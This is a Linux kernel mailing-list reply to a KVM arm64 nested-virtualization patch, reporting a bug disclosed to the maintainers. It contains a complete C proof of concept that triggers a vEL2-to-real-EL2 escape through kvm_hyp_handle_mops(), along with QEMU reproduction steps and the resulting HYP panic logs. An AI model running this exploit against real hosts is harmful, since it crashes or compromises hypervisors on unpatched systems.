All of lore.kernel.org
 help / color / mirror / Atom feed
From: Weiming Shi <bestswngs@gmail.com>
To: Marc Zyngier <maz@kernel.org>, Oliver Upton <oupton@kernel.org>,
	 Catalin Marinas <catalin.marinas@arm.com>,
	Will Deacon <will@kernel.org>
Cc: Joey Gouly <joey.gouly@arm.com>,
	Steffen Eiden <seiden@linux.ibm.com>,
	 Suzuki K Poulose <suzuki.poulose@arm.com>,
	Zenghui Yu <yuzenghui@huawei.com>,
	 Andrew Morton <akpm@linux-foundation.org>,
	Jakub Kicinski <kuba@kernel.org>,
	 Bjorn Andersson <andersson@kernel.org>,
	Mark Rutland <mark.rutland@arm.com>,
	 Kristina Martsenko <kristina.martsenko@arm.com>,
	linux-arm-kernel@lists.infradead.org, kvmarm@lists.linux.dev,
	 Zhong Wang <wangzhong.c0ss4ck@bytedance.com>,
	Xuanqing Shi <shixuanqing.11@bytedance.com>
Subject: Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
Date: Tue, 16 Jun 2026 20:03:55 +0800	[thread overview]
Message-ID: <ajE4lHQevXNHpl1M@Air.local> (raw)
In-Reply-To: <20260616114943.81188-2-bestswngs@gmail.com>



Reproduction Steps:

1. prepare arm64 kernel image

```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs

3. boot qemu with the kernel image

```
qemu-system-aarch64 \
    -machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
    -smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
    -append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
    -nographic -no-reboot
```

PoC:

```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build:  aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run:    sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/


#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>


#define KVM_ARM_VCPU_HAS_EL2  7


#define PSR_MODE_EL1h  0x00000005
#define PSR_MODE_EL2h  0x00000009


#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n)    ARM64_CORE_REG((n) * 2)
#define REG_SP      ARM64_CORE_REG(62)
#define REG_PC      ARM64_CORE_REG(64)
#define REG_PSTATE  ARM64_CORE_REG(66)


#define GUEST_MEM_SIZE   (64 * 1024 * 1024)
#define GUEST_CODE_ADDR  0x40000000ULL
#define GUEST_STACK_TOP  (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR        0x10000000ULL


/*
* Write a single 64-bit register value through KVM_SET_ONE_REG.
*
* fd:  file descriptor the ioctl is issued on (callers pass the vCPU fd)
* id:  register identifier, e.g. one of the REG_* macros
* val: value to store; passed by value, so the kernel reads our local copy
*
* Returns whatever ioctl() returns (negative on failure, errno set).
*/
static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
   struct kvm_one_reg reg = {
       .id = id,
       .addr = (uint64_t)(uintptr_t)&val,
   };
   int rc = ioctl(fd, KVM_SET_ONE_REG, &reg);

   return rc;
}


/*
* Read a single 64-bit register value through KVM_GET_ONE_REG.
*
* fd:  file descriptor the ioctl is issued on
* id:  register identifier, e.g. one of the REG_* macros
* val: destination the kernel is asked to fill in
*
* Returns whatever ioctl() returns (negative on failure, errno set).
*/
static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
   struct kvm_one_reg reg = {
       .id = id,
       .addr = (uint64_t)(uintptr_t)val,
   };
   int rc = ioctl(fd, KVM_GET_ONE_REG, &reg);

   return rc;
}


/*
* Report a fatal error and terminate.
*
* Prints msg followed by the description of the current errno (via perror),
* then exits the process with status 1. Never returns.
*/
static void die(const char *msg)
{
   perror(msg);
   exit(1);
}


/*
* Guest code (runs at virtual EL2h).
*
* Hand-assembled A64 instruction words; main() copies this array to the start
* of guest memory, which is mapped at GUEST_CODE_ADDR, and points the vCPU PC
* there. The offsets below are byte offsets from GUEST_CODE_ADDR (one 32-bit
* word per entry).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Register usage: x0 = copy destination, x1 = copy source, x2 = copy size,
* x3 = MMIO address used to report values to userspace, x10 = CurrentEL
* sampled before the copy, x11 = CurrentEL sampled after the PC reset.
* x9 is zeroed but not read by any later instruction in this sequence.
*
* The "mrs x11" at +0x28 is skipped on the first pass (the branch at +0x1C
* jumps over it); it only executes once the PC has been rewound to
* 0x30 - 8 = 0x28 by the MOPS handler.
*
* Layout (offsets from GUEST_CODE_ADDR):
*   +0x00  setup x0,x1,x2,x3
*   +0x10  movz x9, #0
*   +0x14  mrs x10, CurrentEL         ; record EL before
*   +0x18  str x10, [x3]              ; MMIO exit #1
*   +0x1C  b +16                      ; jump to cpyp at +0x2C
*   +0x20  nop
*   +0x24  nop
*   +0x28  mrs x11, CurrentEL         ; <-- RESET LANDS HERE (0x30-8)
*   +0x2C  cpyp [x0]!, [x1]!, x2!
*   +0x30  cpye [x0]!, [x1]!, x2!    ; EC_MOPS trap
*   +0x34  str x11, [x3]              ; MMIO exit #2 (after 2nd pass)
*   +0x38  b .                        ; done
*/
static const uint32_t guest_code[] = {
   0xd2a80200,  /* +0x00  movz x0, #0x4010, lsl #16  (dest = 0x40100000) */
   0xd2a80401,  /* +0x04  movz x1, #0x4020, lsl #16  (src  = 0x40200000) */
   0xd2a00202,  /* +0x08  movz x2, #0x10, lsl #16    (size = 1MB) */
   0xd2a20003,  /* +0x0C  movz x3, #0x1000, lsl #16  (MMIO = 0x10000000) */
   0xd2800009,  /* +0x10  movz x9, #0 */
   0xd538424a,  /* +0x14  mrs x10, CurrentEL */
   0xf900006a,  /* +0x18  str x10, [x3] */
   0x14000004,  /* +0x1C  b +16 -> +0x2C */
   0xd503201f,  /* +0x20  nop */
   0xd503201f,  /* +0x24  nop */
   0xd538424b,  /* +0x28  mrs x11, CurrentEL (AFTER eret) */
   0x1d010440,  /* +0x2C  cpyp [x0]!, [x1]!, x2! */
   0x1d810440,  /* +0x30  cpye [x0]!, [x1]!, x2! -> EC_MOPS */
   0xf900006b,  /* +0x34  str x11, [x3] */
   0x14000000,  /* +0x38  b . */
};


/*
* Reproducer driver.
*
* Creates a VM with one vCPU that has the HAS_EL2 (nested virt) feature,
* backs GUEST_MEM_SIZE bytes of guest memory at GUEST_CODE_ADDR, loads
* guest_code there, sets up a GICv3 device, starts the vCPU at
* GUEST_CODE_ADDR and runs it for at most 100 KVM_RUN iterations.
*
* The guest reports CurrentEL through writes to MMIO_ADDR; the first two
* such writes are recorded as "EL before" and "EL after" and compared.
*
* Returns 0 after the run loop finishes (whatever the outcome), 1 if the
* vCPU cannot be initialised with HAS_EL2. Other setup failures terminate
* the process through die().
*/
int main(void)
{
   int kvm_fd, vm_fd, vcpu_fd, ret;
   int gic_fd = -1;
   struct kvm_vcpu_init vcpu_init = {0};
   struct kvm_run *run;
   void *guest_mem;
   const char *mode_name = "EL2h";


   setbuf(stdout, NULL);
   setbuf(stderr, NULL);


   printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
   printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");


   kvm_fd = open("/dev/kvm", O_RDWR);
   if (kvm_fd < 0) die("open /dev/kvm");


   vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
   if (vm_fd < 0) die("KVM_CREATE_VM");


   /* Guest memory */
   guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
                    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
   if (guest_mem == MAP_FAILED) die("mmap");


   struct kvm_userspace_memory_region region = {
       .slot = 0,
       .guest_phys_addr = GUEST_CODE_ADDR,
       .memory_size = GUEST_MEM_SIZE,
       .userspace_addr = (uint64_t)guest_mem,
   };
   if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &region) < 0)
       die("KVM_SET_USER_MEMORY_REGION");


   /* The code sits at the very start of the region, i.e. GUEST_CODE_ADDR. */
   memcpy(guest_mem, guest_code, sizeof(guest_code));


   /* Create vCPU with nested virtualization */
   vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
   if (vcpu_fd < 0) die("KVM_CREATE_VCPU");


   if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
       die("KVM_ARM_PREFERRED_TARGET");


   vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2);
   if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
       perror("KVM_ARM_VCPU_INIT with HAS_EL2");
       printf("[-] Nested virtualization not supported.\n");
       return 1;
   }
   printf("[+] vCPU created with nested virt (NV)\n");


   /* GICv3 (required before KVM_RUN) */
   {
       struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
       int gic_ok = 1;

       if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
           die("KVM_CREATE_DEVICE GICv3");
       gic_fd = gic_dev.fd;


       uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
       struct kvm_device_attr attr = {
           .group = KVM_DEV_ARM_VGIC_GRP_ADDR,
           .attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
           .addr = (uint64_t)&dist,
       };

       /*
        * Attribute failures are reported but not fatal, so a partially
        * configured GIC no longer hides behind an unconditional success
        * message while the run is still attempted.
        */
       if (ioctl(gic_fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 DIST");
           gic_ok = 0;
       }
       attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
       attr.addr = (uint64_t)&redist;
       if (ioctl(gic_fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 REDIST");
           gic_ok = 0;
       }


       attr = (struct kvm_device_attr){
           .group = KVM_DEV_ARM_VGIC_GRP_CTRL,
           .attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
       };
       if (ioctl(gic_fd, KVM_SET_DEVICE_ATTR, &attr) < 0) {
           perror("KVM_SET_DEVICE_ATTR GICv3 CTRL_INIT");
           gic_ok = 0;
       }

       if (gic_ok)
           printf("[+] GICv3 initialized\n");
       else
           printf("[!] GICv3 setup incomplete, continuing anyway\n");
   }


   /* Set vCPU state: start at virtual EL2h */
   if (kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR) < 0)
       die("KVM_SET_ONE_REG PC");
   if (kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP) < 0)
       die("KVM_SET_ONE_REG SP");
   if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
       printf("[!] Cannot set EL2h, falling back to EL1h\n");
       if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h) < 0)
           die("KVM_SET_ONE_REG PSTATE");
       /* Report the mode that was actually programmed. */
       mode_name = "EL1h";
   }
   printf("[+] vCPU: PC=0x%llx PSTATE=%s SP=0x%llx\n",
          (unsigned long long)GUEST_CODE_ADDR,
          mode_name,
          (unsigned long long)GUEST_STACK_TOP);


   /* Map kvm_run */
   int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
   /* A negative size would be converted to a huge length by mmap(). */
   if (run_size < 0) die("KVM_GET_VCPU_MMAP_SIZE");
   run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0);
   if (run == MAP_FAILED) die("mmap vcpu");


   /* Execute guest */
   printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");


   int mmio_count = 0;
   uint64_t el_before = 0, el_after = 0;


   for (int i = 0; i < 100; i++) {
       ret = ioctl(vcpu_fd, KVM_RUN, 0);
       if (ret < 0) {
           printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
           /* Skip the "max iterations" message: that is not what happened. */
           goto done;
       }


       switch (run->exit_reason) {
       case KVM_EXIT_MMIO:
           if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
               uint64_t val = 0;
               size_t len = run->mmio.len;

               /* Never copy more than the local variable can hold. */
               if (len > sizeof(val))
                   len = sizeof(val);
               memcpy(&val, run->mmio.data, len);
               mmio_count++;
               /* CurrentEL keeps the exception level in bits [3:2]. */
               printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
                      mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3);
               if (mmio_count == 1) el_before = (val >> 2) & 3;
               if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; }
           }
           break;


       case KVM_EXIT_INTERNAL_ERROR:
           printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
           goto done;


       case KVM_EXIT_FAIL_ENTRY:
           printf("[-] FAIL_ENTRY: 0x%llx\n",
                  (unsigned long long)run->fail_entry.hardware_entry_failure_reason);
           goto done;


       default:
           printf("[*] exit_reason=%u (iter %d)\n", (unsigned)run->exit_reason, i);
           break;
       }
   }
   printf("[-] Max iterations reached without result.\n");
   goto done;


results:
   printf("\n========== RESULTS ==========\n");
   printf("  EL before MOPS: EL%lld\n", (long long)el_before);
   printf("  EL after  MOPS: EL%lld\n", (long long)el_after);
   printf("=============================\n\n");


   if (el_after > el_before)
       printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
              (long long)el_before, (long long)el_after);
   else
       printf("[+] No escalation observed in guest registers.\n");


done:
   printf("\n[*] Check dmesg for HYP panic:\n");
   printf("    dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
   printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");


   if (gic_fd >= 0)
       close(gic_fd);
   close(vcpu_fd);
   close(vm_fd);
   close(kvm_fd);
   munmap(guest_mem, GUEST_MEM_SIZE);
   munmap(run, run_size);
   return 0;
}

```

crash log

```
========== FatalMOPS dynamic test (L1 host) ==========
  [*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
      /sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
  [+] /dev/kvm present
  [*] dmesg nested-virt lines:
  [*] launching /poc ...
  [*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
  [+] vCPU created with nested virt (HAS_EL2)
  [+] GICv3 initialized
  [+] vCPU starts at virtual EL2h
  [*] Running guest. Vulnerable kernel -> HYP panic expected.
  [+] MMIO #1: CurrentEL=EL2
  [    3.326956] Kernel panic - not syncing: HYP panic:
  [    3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
  [    3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  [    3.326956] VCPU:000000006f4e5727
  [    3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  [    3.349460] Hardware name: linux,dummy-virt (DT)
  [    3.353136] Call trace:
  [    3.355241]  show_stack+0x18/0x24 (C)
  [    3.358652]  dump_stack_lvl+0x34/0x8c
  [    3.361515]  dump_stack+0x18/0x24
  [    3.364085]  vpanic+0x47c/0x4dc
  [    3.366527]  do_panic_on_target_cpu+0x0/0x1c
  [    3.369782]  kvm_unexpected_el2_exception+0x0/0x3c0
  [    3.373494]  hyp_panic+0x0/0x80
  [    3.375940]  kvm_arm_vcpu_enter_exit+0x64/0x94
  [    3.379372]  kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
  [    3.382919]  kvm_vcpu_ioctl+0x174/0xa38
  [    3.385894]  __arm64_sys_ioctl+0xac/0x104
  [    3.389105]  invoke_syscall+0x54/0x10c
  [    3.392015]  el0_svc_common.constprop.0+0x40/0xe0
  [    3.395653]  do_el0_svc+0x1c/0x28
  [    3.398236]  el0_svc+0x38/0x11c
  [    3.400681]  el0t_64_sync_handler+0xa0/0xe4
  [    3.403872]  el0t_64_sync+0x198/0x19c
  [    3.407083] SMP: stopping secondary CPUs
  [    3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
  [    3.415585] PHYS_OFFSET: 0x40000000
  [    3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
  [    3.423170] Memory Limit: none
```

after decode

```
  Kernel panic - not syncing: HYP panic:
  PS:00000009 PC:0000000040000028 ESR:86000005
  FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
  VCPU:000000006f4e5727
  CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
  Call trace:
   show_stack                   (arch/arm64/kernel/stacktrace.c:499)
   dump_stack_lvl               (lib/dump_stack.c:94 120)
   dump_stack                   (lib/dump_stack.c:129)
   vpanic                       (kernel/panic.c:650)
   do_panic_on_target_cpu       (kernel/panic.c:341)
   kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
                                 → arch/arm64/kvm/hyp/vhe/switch.c:688)
   hyp_panic                    (arch/arm64/kvm/hyp/vhe/switch.c:678)
   kvm_arm_vcpu_enter_exit      (arch/arm64/kvm/arm.c:1227)
   kvm_arch_vcpu_ioctl_run      (arch/arm64/kvm/arm.c:1324)
   kvm_vcpu_ioctl               (virt/kvm/kvm_main.c:4470)
   __arm64_sys_ioctl            (fs/ioctl.c:51 597 583)
   invoke_syscall               (arch/arm64/kernel/syscall.c:35 49)
   el0_svc_common.constprop.0   (arch/arm64/kernel/syscall.c:121)
   do_el0_svc                   (arch/arm64/kernel/syscall.c:140)
   el0_svc                      (arch/arm64/kernel/entry-common.c:740)
   el0t_64_sync_handler         (arch/arm64/kernel/entry-common.c:759)
   el0t_64_sync                 (arch/arm64/kernel/entry.S:594)
```



  reply	other threads:[~2026-06-16 12:04 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi [this message]
2026-06-16 20:14 ` Oliver Upton

Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=ajE4lHQevXNHpl1M@Air.local \
    --to=bestswngs@gmail.com \
    --cc=akpm@linux-foundation.org \
    --cc=andersson@kernel.org \
    --cc=catalin.marinas@arm.com \
    --cc=joey.gouly@arm.com \
    --cc=kristina.martsenko@arm.com \
    --cc=kuba@kernel.org \
    --cc=kvmarm@lists.linux.dev \
    --cc=linux-arm-kernel@lists.infradead.org \
    --cc=mark.rutland@arm.com \
    --cc=maz@kernel.org \
    --cc=oupton@kernel.org \
    --cc=seiden@linux.ibm.com \
    --cc=shixuanqing.11@bytedance.com \
    --cc=suzuki.poulose@arm.com \
    --cc=wangzhong.c0ss4ck@bytedance.com \
    --cc=will@kernel.org \
    --cc=yuzenghui@huawei.com \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line before the message body.
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.